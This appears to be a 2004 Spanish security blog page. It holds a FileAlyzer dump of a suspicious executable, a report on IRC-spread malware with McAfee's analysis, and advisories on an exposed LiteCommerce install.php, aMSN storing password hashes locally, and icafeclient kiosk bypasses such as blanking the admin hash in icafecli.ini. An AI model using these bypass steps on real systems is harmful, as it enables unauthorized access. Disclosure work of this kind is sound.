    BBHELP
    BBIGNORE
    BBNO
    BBOK
    BBRETRY
    BBYES
    CDROM
    CLOSEDFOLDER
    CURRENTFOLDER
    EXECUTABLE
    FLOPPY
    HARD
    KNOWNFILE
    NETWORK
    OPENFOLDER
    RAM
    TNEWBEVEL
    TNEWGAUGE
    UNKNOWNFILE
    --- Icon -----------------------------------------------------------
    1
    2
    3
    4
    --- String Table ---------------------------------------------------
    3841
    3842
    3843
    3844
    3845
    3846
    3847
    3848
    3849
    3850
    3851
    3852
    3853
    4089
    4090
    4091
    4093
    4094
    4095
    --- RCData ---------------------------------------------------------
    TFLIC
    TFOLFORM
    TINSTALLFORM
    TMAINFORM
    TPWDFORM
    --- Cursor Group ---------------------------------------------------
    32762
    32763
    32764
    32765
    32766
    32767
    --- Icon Group -----------------------------------------------------
    MAINICON
    --- Version Info ---------------------------------------------------
    1
    --- XP Manifest ----------------------------------------------------
    1
    ?xml version="1.0" encoding="UTF-8" standalone="yes"?
    assembly xmlns="urn:schemas-microsoft-com:asm.v1"
    manifestVersion="1.0"
    assemblyIdentity
    name="Your.Application.Name.Here"
    processorArchitecture="x86"
    version="1.0.0.0"
    type="win32"/
    description Windows Shell /description
    dependency
    dependentAssembly
    assemblyIdentity
    type="win32"
    name="Microsoft.Windows.Common-Controls"
    version="6.0.0.0"
    processorArchitecture="x86"
    publicKeyToken="6595b64144ccf1df"
    language="*"
    dependentAssembly
    /dependency
    /assembly

    ***** PE Header ****************************************************
    Signature: 00004550
    Machine: 014C - Intel 386
    Number of sections: 0008
    Time/Date stamp: 2A425E19
    Pointer to symbol table: 00000000
    Number of symbols: 00000000
    Size of optional header: 00E0
    Characteristics: 818F
    Magic: 010B
    Linker version (major): 02
    Linker version (minor): 19
    Size of code: 00036A00
    Size of initialized data: 0000FC00
    Size of uninitialized data: 00000000
    Address of entry point: 00037468
    Base of code: 00001000
    Base of data: 00038000
    Image base: 00400000
    Section alignment: 00001000
    File alignment: 00000200
    OS version (major): 0001
    OS version (minor): 0000
    Image version (major): 0000
    Image version (minor): 0000
    Sub system version (major): 0004
    Sub system version (minor): 0000
    Win32 version: 00000000
    Size of image: 0004E000
    Size of headers: 00000400
    Checksum: 00000000
    Sub system: 0002 - Windows graphical user interface
    (GUI) subsystem
    DLL characteristics: 0000
    Size of stack reserve: 00100000
    Size of stack commit: 00004000
    Size of heap reserve: 00100000
    Size of heap commit: 00001000
    Loader flags: 00000000
    Number of RVA: 00000010

    ***** PE Sections **************************************************
    CRC-32: ?
    MD5: ?
    ----- PE Sections --------------------------------------------------
    Section VirtSize VirtAddr PhysSize PhysAddr Flags
    CODE 00036854 00001000 00036A00 00000400 60000020
    DATA 00001DE4 00038000 00001E00 00036E00 C0000040
    BSS 00002508 0003A000 00000000 00038C00 C0000000
    .idata 00001CBA 0003D000 00001E00 00038C00 C0000040
    .tls 00000008 0003F000 00000000 0003AA00 C0000000
    .rdata 00000018 00040000 00000200 0003AA00 50000040
    .reloc 000033D8 00041000 00000000 00000000 50000040
    .rsrc 00008A00 00045000 00008A00 0003AC00 50000040

    ***** Import/Export table ******************************************
    --- Export table ---------------------------------------------------
    --- Import table (libraries: 12) -----------------------------------
    kernel32.dll (imports: 36)
    DeleteCriticalSection
    LeaveCriticalSection
    EnterCriticalSection
    InitializeCriticalSection
    VirtualFree
    VirtualAlloc
    LocalFree
    LocalAlloc
    WideCharToMultiByte
    TlsSetValue
    TlsGetValue
    SetCurrentDirectoryA
    RemoveDirectoryA
    MultiByteToWideChar
    GetModuleHandleA
    GetModuleFileNameA
    GetLastError
    GetCommandLineA
    GetCurrentDirectoryA
    ExitThread
    CreateThread
    CreateDirectoryA
    WriteFile
    SetFilePointer
    SetEndOfFile
    RtlUnwind
    ReadFile
    RaiseException
    MoveFileA
    GetStdHandle
    GetFileSize
    GetFileType
    ExitProcess
    DeleteFileA
    CreateFileA
    CloseHandle
    user32.dll (imports: 1)
    MessageBoxA
    oleaut32.dll (imports: 5)
    VariantChangeTypeEx
    VariantCopyInd
    VariantClear
    SysStringLen
    SysAllocStringLen
    advapi32.dll (imports: 6)
    RegSetValueExA
    RegQueryValueExA
    RegOpenKeyExA
    RegFlushKey
    RegCreateKeyExA
    RegCloseKey
    kernel32.dll (imports: 64)
    WriteFile
    WinExec
    WaitForSingleObject
    VirtualAlloc
    TerminateThread
    SizeofResource
    SetFileTime
    SetFilePointer
    SetFileAttributesA
    SetErrorMode
    SetCurrentDirectoryA
    ResumeThread
    ReadFile
    MultiByteToWideChar
    MulDiv
    LockResource
    LocalFileTimeToFileTime
    LoadResource
    LoadLibraryA
    GlobalUnlock
    GlobalReAlloc
    GlobalHandle
    GlobalLock
    GlobalFree
    GlobalDeleteAtom
    GlobalAlloc
    GlobalAddAtomA
    GetWindowsDirectoryA
    GetVolumeInformationA
    GetVersionExA
    GetVersion
    GetSystemDirectoryA
    GetSystemDefaultLCID
    GetShortPathNameA
    GetProcAddress
    GetModuleFileNameA
    GetLogicalDrives
    GetLocaleInfoA
    GetLastError
    GetFullPathNameA
    GetFileAttributesA
    GetExitCodeThread
    GetExitCodeProcess
    GetEnvironmentVariableA
    GetDriveTypeA
    GetCurrentThreadId
    GetCurrentProcessId
    GetCurrentProcess
    FreeResource
    FreeLibrary
    FindResourceA
    FindNextFileA
    FindFirstFileA
    FindClose
    FileTimeToLocalFileTime
    FileTimeToDosDateTime
    DosDateTimeToFileTime
    DeleteFileA
    CreateThread
    CreateProcessA
    CreateFileA
    CreateDirectoryA
    CompareStringA
    CloseHandle
    mpr.dll (imports: 1)
    WNetGetConnectionA
    version.dll (imports: 3)
    VerQueryValueA
    GetFileVersionInfoSizeA
    GetFileVersionInfoA
    gdi32.dll (imports: 58)
    UnrealizeObject
    TextOutA
    StretchDIBits
    StretchBlt
    SetWindowOrgEx
    SetWinMetaFileBits
    SetViewportOrgEx
    SetTextColor
    SetStretchBltMode
    SetROP2
    SetEnhMetaFileBits
    SetBkMode
    SetBkColor
    SelectPalette
    SelectObject
    SaveDC
    RestoreDC
    Rectangle
    RectVisible
    RealizePalette
    PlayEnhMetaFile
    PatBlt
    MoveToEx
    IntersectClipRect
    GetWindowOrgEx
    GetWinMetaFileBits
    GetTextMetricsA
    GetTextExtentPointA
    GetSystemPaletteEntries
    GetStockObject
    GetPixel
    GetPaletteEntries
    GetObjectA
    GetEnhMetaFilePaletteEntries
    GetEnhMetaFileHeader
    GetEnhMetaFileBits
    GetDeviceCaps
    GetDIBits
    GetCurrentPositionEx
    GetClipBox
    GetBitmapBits
    ExcludeClipRect
    EnumFontsA
    DeleteObject
    DeleteEnhMetaFile
    DeleteDC
    CreateSolidBrush
    CreateRectRgn
    CreatePenIndirect
    CreatePalette
    CreateFontIndirectA
    CreateDIBitmap
    CreateCompatibleDC
    CreateCompatibleBitmap
    CreateBrushIndirect
    CreateBitmap
    CopyEnhMetaFileA
    BitBlt
    user32.dll (imports: 135)
    WindowFromPoint
    WinHelpA
    WaitMessage
    WaitForInputIdle
    UpdateWindow
    UnregisterClassA
    UnhookWindowsHookEx
    TranslateMessage
    TranslateMDISysAccel
    TrackPopupMenu
    SystemParametersInfoA
    ShowWindow
    ShowOwnedPopups
    ShowCursor
    SetWindowRgn
    SetWindowsHookExA
    SetWindowTextA
    SetWindowPos
    SetWindowPlacement
    SetWindowLongA
    SetTimer
    SetScrollPos
    SetScrollInfo
    SetRect
    SetPropA
    SetMenu
    SetForegroundWindow
    SetFocus
    SetCursor
    SetCapture
    SetActiveWindow
    SendMessageA
    ScrollWindow
    ScreenToClient
    RemovePropA
    RemoveMenu
    ReleaseDC
    ReleaseCapture
    RegisterWindowMessageA
    RegisterClassA
    PtInRect
    PostQuitMessage
    PostMessageA
    PeekMessageA
    OffsetRect
    OemToCharA
    MessageBoxA
    MapWindowPoints
    MapVirtualKeyA
    LoadStringA
    LoadIconA
    LoadCursorA
    LoadBitmapA
    KillTimer
    IsZoomed
    IsWindowVisible
    IsWindowEnabled
    IsWindow
    IsRectEmpty
    IsIconic
    IsDialogMessageA
    InvalidateRect
    IntersectRect
    InsertMenuItemA
    InsertMenuA
    InflateRect
    GetWindowThreadProcessId
    GetWindowTextA
    GetWindowRgn
    GetWindowRect
    GetWindowPlacement
    GetWindowLongA
    GetSystemMetrics
    GetSystemMenu
    GetSysColor
    GetSubMenu
    GetScrollPos
    GetPropA
    GetParent
    GetWindow
    GetMenuStringA
    GetMenuState
    GetMenuItemCount
    GetMenu
    GetLastActivePopup
    GetKeyState
    GetKeyNameTextA
    GetIconInfo
    GetForegroundWindow
    GetFocus
    GetDesktopWindow
    GetDCEx
    GetDC
    GetCursorPos
    GetCursor
    GetClipboardData
    GetClientRect
    GetClassInfoA
    GetCapture
    GetActiveWindow
    FrameRect
    FillRect
    EqualRect
    EnumWindows
    EnumThreadWindows
    EndPaint
    EnableWindow
    EnableMenuItem
    DrawTextA
    DrawMenuBar
    DrawIcon
    DrawFocusRect
    DrawEdge
    DispatchMessageA
    DestroyWindow
    DestroyMenu
    DestroyIcon
    DestroyCursor
    DeleteMenu
    DefWindowProcA
    DefMDIChildProcA
    DefFrameProcA
    CreateWindowExA
    CreatePopupMenu
    CreateMenu
    CreateIcon
    ClientToScreen
    CheckMenuItem
    CallWindowProcA
    CallNextHookEx
    BeginPaint
    CharLowerBuffA
    CharLowerA
    CharUpperBuffA
    AdjustWindowRectEx
    comctl32.dll (imports: 12)
    ImageList_GetDragImage
    ImageList_DragShowNolock
    ImageList_SetDragCursorImage
    ImageList_DragMove
    ImageList_DragLeave
    ImageList_DragEnter
    ImageList_EndDrag
    ImageList_BeginDrag
    ImageList_SetBkColor
    ImageList_ReplaceIcon
    ImageList_Destroy
    ImageList_Create
    ole32.dll (imports: 3)
    CoCreateInstance
    CoUninitialize
    CoInitialize
    shell32.dll (imports: 1)
    ShellExecuteA
    ********************************************************************
    FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
    ********************************************************************

    Estamos en un seguimiento mayor de esta situacion ya que cada vez son
    mas los usuarios que dia a dia entran en el irc y dejan el link hacia
    la web ...lo que nos hace pensar que sea lo ke sea se esta extendiendo
    y deprisa ... pues en apenas dos dias hemos pasado de uno o dos
    usuarios o bots que entraban a ya casi los 100 por dia en diferentes
    canales.

    Despues de observar esta situacion y pensar en que hacer , decidimos
    enviar muestras a las casas antivirus (panda,mcaffe,bitdefender,avp y
    alguno mas) hasta ahora solo mcaffe contesto a nuestro rekerimiento
    ,contestando
    sobre el archivo de muestra enviado lo siguiente :

    ==================================
    fwd del mail de mcaffe con la respuesta :
    ==================================
    From: Virus Research virus_research@avertlabs.com
    Date: Mon, 13 Sep 2004 12:15:50 -0700
    Subject: RE: Escalation: 1301426 - Re: posible nuevo virus ???
    To: Lostmon lostmon@gmail.com

    A.V.E.R.T. Sample Analysis
    Issue Number:1301426
    Virus Research Analyst: Brant Yaeger
    Identified: mrsn.ex ... Found application HideWindow.
    ping.hlp ... Found the IRC/Flood.bi trojan !!!
    rebot.dll ... Found application IRC/Flood.tool.
    Symad.ex ... Found application Tool-WGet.
    tuqa.dll ... Found application IRC/Flood.tool.
    Windows.icm ... Found the IRC/Flood.dt trojan !!!
    zerz.dll ... Found the IRC/Seiseni.worm virus !!!

    AVERT(tm) Labs, Beaverton, OR

    Thank you for submitting your suspicious files.

    Synopsis -

    This malware can be identified and removed with our current scanners
    (Version 4x Engine 4.2.60 + the current DAT).

    In order to get the fastest possible response, you may wish to submit future
    virus-samples to http://www.webimmune.net. In most cases it can respond
    almost instantly with a solution.

    More and more malware threats are taking advantage of open file and printer
    shares to spread, without users having to actually execute any files.

    If your computer is not networked with other machines, there is no need to
    have file and printer sharing installed, so it should be disabled. If your
    computer is networked with others, you may need to have some level of file
    and printer sharing. In either case, if you are affected by one of these
    threats, you may need to adjust your level of file and printer sharing to
    take care of the problem.

    Please consult with your administrator before making any changes on your
    own, if you're on a LAN.

    For other virus-related information, please see the AVERT homepage at:
    http://vil.mcafeesecurity.com/vil/default.asp

    Solution -

    If you are using an Engine older than what is current, we strongly recommend
    that you upgrade as, in a lot of cases, an old engine will not identify and
    remove certain malware (even with a current set of DAT files). So, as well
    as DAT files, engines need to be updated to include regular changes and
    improvements made to the scanner.

    =======================================================

    Lo cual en resumidas cuentas dice viene a decir ...que si que hay
    codigo virico en esos
    programas o esos exe que son descargados...y ademas nos proporcionan
    las partes de esos virus o
    malware( los payloads),que son los archivos que se instalan en sistema
    una vez ejecutado el exe ...

    Despues de haber echo algunas pruebas con algun antivirus
    por ahora solo mcaffe nos lo ha detectado con el engine 4.x y las
    ultimas bases de datos del antivirus ( el dat ke contiene las firmas
    de virus).. revisar esta informacion y intentar no clicar en ninguna
    web quie no conozcais ,y si por lo ke sea llegais a una de esas webs
    ni se os ocurra ejecutar el exe ke se descarga ,si usais opera o otro
    navegador que no sea explorer , lo vereis enseguida pues en la ventana
    de descarga vereis la doble extension y la ultima sera un exe ..ir
    con cuidado.

    atentamente:
    El equipo de #ayuda_internet

    http://www.ayuda-internet.net
    La ayuda ..nuestra razón de ser.

    Tiendas vistuales basadas en Litecommerce vulnerables


    En los ultimos das surgio una vulnerabilidad en postnuke

    (http://www.securitytracker.com/alerts/2004/Jul/1010755.html)


    despues de leer el advisore y buscar en google con fines estadisticos los posibles sites vulnerables,me di cuenta de que no todos los links ivan a dar digamos a paginas normales en postnuke, si no que algunos de esos link ivan directamente al archivo de instalacion de un tipo de tienda virtual llamada litecommerce (http://www.litecommerce.com/) en una instalacion por defecto ,la tienda deja un archivo llamado 'install.php' como en el bug anterior de postnuke,desde ese archivo podemos iniciar la instalacion de la tienda virtual remotamente.podriamos reconfigurar el site completamente,pass de la base de datos,contenidos dela tienda ,percios y demas.todo seria perfecto si ... en algunas de las interfaces encontradas no pidiera el 'auth code ' es como el serial de proteccion ,para el uso indebido del script.No es en todas las interfaces que pide ese codig ,encontramos versiones 2.0.0 con el form para el code y la misma version,sin el form ,lo cual si permitia la instalacion,y configuracion del sitepara explotar la vulnerabilidad ,bastaria con encuntrar ese archivo ,que suele estar aqui: http://www.hosts.com/install.php http://www.host.com/path_to_shop/install.php
    no he tenido acceso a un numero de serie estandar del soft para poder establecer,o decir si con cualkier numero del programa ,podria iniciarse la instalacion en cualkier site que estubiese basado en litecommerce

    thx to http://www.ayuda-internet.net/ por su apoyo :)
    thx Estrella ya sabes que eres mi luz ;P
    thx to Rottew & Lutrizia formamos buena familia no ?? :DD
    by lostmon (lostmon@gmail.com)

    Securitytracker url: http://securitytracker.com/alerts/2004/Jul/1010778.html

    La curiosidad es lo que hace mover la mente

    aMNS deja ver los hash de los usuarios

    Thursday, November 04, 2004



    El popular cliente de msn para linux AMSN ahora en sus versiones para windows ;sufre una vulnerabilidad ,atraves de la cual puede un usuario local obtener el hash de la cuenta con la cual se inicio sesion en el programa.Despues de haber observado que el cliente amsn al hacer login en el y recibir un nuevo correo nos sale un sobre en la barra de tareas indicando que ha llegado un nuevomail ;le programa abre una pagina local llamada 'hotlog.htm' la cual contiene el usuario y el password codificado del usuario que inicio sesion en el (hash)aparte de otros datos de importante relevancia.Asi mismo el archivo ?config.xml tambien permitiria ver el password codificado solo y si se marco la opcion de recordar contraseña podriamos tambien obtener el hash y el remote pass de la cuenta con la cual se inicio sesion.


    Hasta el momento no se ha recibido ninguna solucion por parte del desarroyador del producto
    la explotacion y explicacion de este agujero es por la forma en que guarda la informacion amsn en la maquina;un usuario local mal intencionado podria tener acceso a esos datos ;llevarlos a otra makina y hacer uso de ellos para acceder a esa cuenta.


    Links relacionados:
    http://www.securitytracker.com/alerts/2004/Jun/1010555.html
    http://sourceforge.net/tracker/index.php?func=detail&aid=976450&group_id=54091&atid=472655
    http://sourceforge.net/tracker/index.php?func=detail&aid=979793&group_id=54091&atid=472655"

    OSVDB ID :8123and 15049
    atentamente
    Lostmon (lostmon@gmail.com)

    Thnx to estrella she is :) she ?...

    --
    la curiosidad es lo que hace mover la mente...

    Multiples vulnerabilidades en el software icafeclient


    #################################################
    ######## multiples vulnerabilidades en el software icafeclient
    ######## vendor Url:http://www.mitsoftware.com/
    ###### 1-donde se han realizado las pruebas
    ###### 2- explicacion del uso del programa
    ###### 3- repoduccion de los bugs
    ###### 4- agradecimientos.
    ###### OSVDB ID: 8105
    ###### Secunia:SA12101
    #################################################


    ###################################
    1-donde se han realzado las pruebas
    ###################################


    Para testear estas vulnerabilidades se ha usado
    Sistema: win98 se con todos los hotfix-icafecli v 2.6 rv 2004.72
    Vendor http://www.mitsoftware.com/ xploit: no es necesario xploit

    ###################################
    2- explicacion del software
    ###################################
    I-cafe es un programa para la gestion de cybercafes,es un programa
    basado en cliente/servidor,el cual permite la gestion de usuarios,
    programas que se pueden ejecutar en el pc y propone algunas opciones
    de seguridad.
    El software en concreto posee una interfaz desde la cual se tiene acceso a
    los programas que el admin digamos ,deja usar,asi no podemos ejecutarlos
    directamente,nada mas que por la interfaz del programa.
    El programa trabaja con usuarios y passwords (socios),con tiempos de codigos
    predefinidos,(time code) o bien por tiempo abierto(time play) en el cual se paga
    cuando finaliza la sesion ,por tiempo usado.

    ###################################
    3- reproduccion de los bugs
    ###################################

    3.1-cerrar el programa y evitar su ejecucion:

    El programa es cargado como servicio,para ello se incluye en el registro
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
    \CurrentVersion\Run\
    ahy añade un valor de cadena I-Cafe Client y con el valor del path
    donde este guardado.
    El programa en el caso del test lo pusimos en C:\protegido\ICAFECLI.EXE
    podemos hacer dos cosas primera seria reiniciar el pc y cuando entra en windows,
    antes de que salte el programa icafe,podemos hacer ctrl+alt+supr buscar el proceso
    llamado icafecli y finalizarlose iniciara el pc y no tendremos el soft de gestion corriendo
    ...despues , si el soft no ha impuesto las restricciones podemos ademas borrar la clave de
    registro que hace la llamada al programa para su ejecucion.
    En el servidor se vera como pc inactivo,pero para ello el admin debera actualizar la sala.

    3.2-saltarse la restriccion de acceso al disco duro:

    Si el administrador, ha impuesto las restricciones para windows en las opciones de seguridad
    del programa ,en teoria no tenemos acceso al disco,aunque eso es un estado efimero :)
    iniciamos icafe con nuestra cuenta de socio o bien con un codigo de time play o time code.
    Iniciamos el explorador y en la barra de direcciones comprobamos que poniendo como url
    c:\ nos deniega el acceso a disco,pero si ponemos escritorio no da aceso al escritorio ,faltara
    señalar un icono y sobre el alt+enter y ahy en la ventana resultante damos a buscar destino
    da acceso al disco :/
    despues solo es cuestion de buscar lo que nos interesa entre el disco :)
    otra forma mas facil de poder saltarse esa restriccion es atraves de algun cliente de irc,
    como Mirc o X-script abriremos el cliente de irc y tecleamos /run c: y tambien nos
    da acceso al disco.

    3.3-resetear el password de admin y cambiarlo por otro:

    En la interfaz del programa si clicamos en admin ,nos pide un password que es para poder configurar las opciones del software icafeclient, accedemos a disco de la forma antes explicada y vamos hasta c:\windows y ahy buscamos el archivo llamado icafecli.ini en el cual viene la configuracion que el programa toma al iniciarse en la makina en cuestion si miramos dentro de ese archivo vemos lo siguiente:


    #########################
    codigo de icafecli.ini admin
    #########################

    la parte que nos interesa es esta
    "xadmin=312a353424243a2c23313b222d2a24"
    o algo parecido a eso
    ##################################################

    Como podemos ver estan tods las opciones del programa, pero como de momento
    no sabemos en las opciones de seguridad, lo que hemos de cambiar,pues no sabemos
    que es cada cosa...lo haremos directamente desde el programa, para ello primero miraremos
    el archivo icafecli.ini y cambiaremos xadmin=312a353424243a2c23313b222d2a24
    por xadmin= salvaremos los cambios, iremos a la interfaz del programa ,clicaremos en admin
    y dejaremos en blanco el password del programa nos da aceso a la interfaz de configuracion :/
    ###################################
    4-agradecimientos
    ###################################

    gracias a los que me ayudais dia a dia y confiais en mi
    gracias a Estrella por ser mi luz
    gracias a rottew y lutrizia por ser como son y estar conmigo

    La curiosidad es lo que hace mover la mente...


    Latest OSVDB Vulnerabilities

     

    Browse

    About:Me

    My blog:http://lostmon.blogspot.com
    Mail:Lostmon@gmail.com
    Lostmon Google group
    Lostmon@googlegroups.com

    La curiosidad es lo que hace
    mover la mente...